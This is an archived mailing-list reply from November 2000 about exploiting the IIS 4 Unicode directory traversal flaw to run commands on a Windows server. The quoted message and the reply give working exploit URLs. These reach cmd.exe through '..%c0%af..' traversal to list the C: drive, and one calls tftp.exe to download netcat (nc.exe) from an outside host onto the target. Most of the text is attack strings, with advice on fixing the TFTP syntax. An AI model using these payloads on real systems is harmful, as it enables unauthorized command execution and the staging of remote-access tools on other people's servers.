Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: dos commands via iis 4 (TFTP)

From: "Robert A. Seace" <ras () SLARTIBARTFAST MAGRATHEA COM>
Date: Fri, 10 Nov 2000 13:11:38 -0500
In the profound words of Loschiavo, Dave:


I tried tftp commands in the URL, formatted like this:
http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/c
md.exe?/tftp+-i+192.168.1.20+nc.exe"

and got nowhere, while this:
http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/c
md.exe?/c+dir+c: gave me a listing of the of the c: drive.

Am I formatting the "TFTP" URL incorrectly?


        Yeah, I think so...  But, I'm no TFTP guru, either...
Personally, I would just use RCP...

        However, looking at the original advisory on BugTraq, that
mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048";),
I think you need a "GET" before the "nc.exe", and maybe a destination
location specified after it, for where to place it on the NT box...
For instance, it shows an URL of:

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe

--
||========================================================================||
||    Rob Seace    ||               URL              || ras () magrathea com ||
||  AKA: Agrajag   || http://www.magrathea.com/~ras/ || rob () wordstock com ||
||========================================================================||
"A dead telephone sanitizer?" "Best kind." "But what's he doing here?"
"Not a lot." - The Restaurant at the End of the Universe
Previous By Date Next
Previous By Thread Next

Current thread: